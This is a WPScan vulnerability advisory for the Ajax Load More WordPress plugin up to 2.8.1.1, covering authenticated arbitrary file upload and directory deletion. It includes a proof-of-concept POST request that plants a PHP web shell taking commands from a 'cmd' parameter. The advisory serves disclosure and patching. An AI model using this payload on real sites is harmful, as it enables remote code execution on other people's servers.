Ajax Load More <= 2.8.1.1 - Authenticated File Upload & Deletion

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Authenticated file upload in file ajax-load-more/admin/admin.php file, in the function alm_save_repeater().

The variable $f is set to a predictable PHP file path, and then the content of the variable $c is written into that file.

The following code proves that this second variable is also set from untrusted input :
$c = Trim(stripslashes($_POST["value"])); // Repeater Value

Therefore, an evil person can write arbitrary PHP code to the website by doing a POST query to http://<WP-path>/wp-admin/admin-ajax.php

He can then execute the evil PHP code for example by sending a simple request to http://<WP-path>/wp-content/plugins/ajax-load-more/core/repeater/default.php

Authenticated file deletion in file ajax-load-more/admin/admin.php file, in the function alm_delete_cache().

$cache = $_POST["cache"];
[...]
$dir = ALM_CACHE_PATH .'_cache/'.$cache;
[...]
foreach (glob($dir."/*.*") as $filename) {
[...]
unlink($filename);
[...]
rmdir($dir);
Proof of Concept
* Arbitrary file upload exploitation :

POST http://<WP-path>/wp-admin/admin-ajax.php

action=alm_save_repeater
nonce=<WP-nonce>
type=default
repeater=blablabla
value=<?php exec($_GET['cmd']) ?>

=> The provided PHP evil code will be stored in ajax-load-more/core/repeater/default.php

Affects

Plugin ajax-load-more
fixed in version 2.8.1.2

References

EXPLOITDB 38660
URL https://wordpress.org/plugins/ajax-load-more/changelog/

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter PizzaHatHacker
Views 634
Verified No
WPVDB ID 8209

Timeline

Publicly Published 2015-10-10 (about 1 year ago)
Added 2015-10-11 (about 1 year ago)
Last Updated 2015-11-10 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.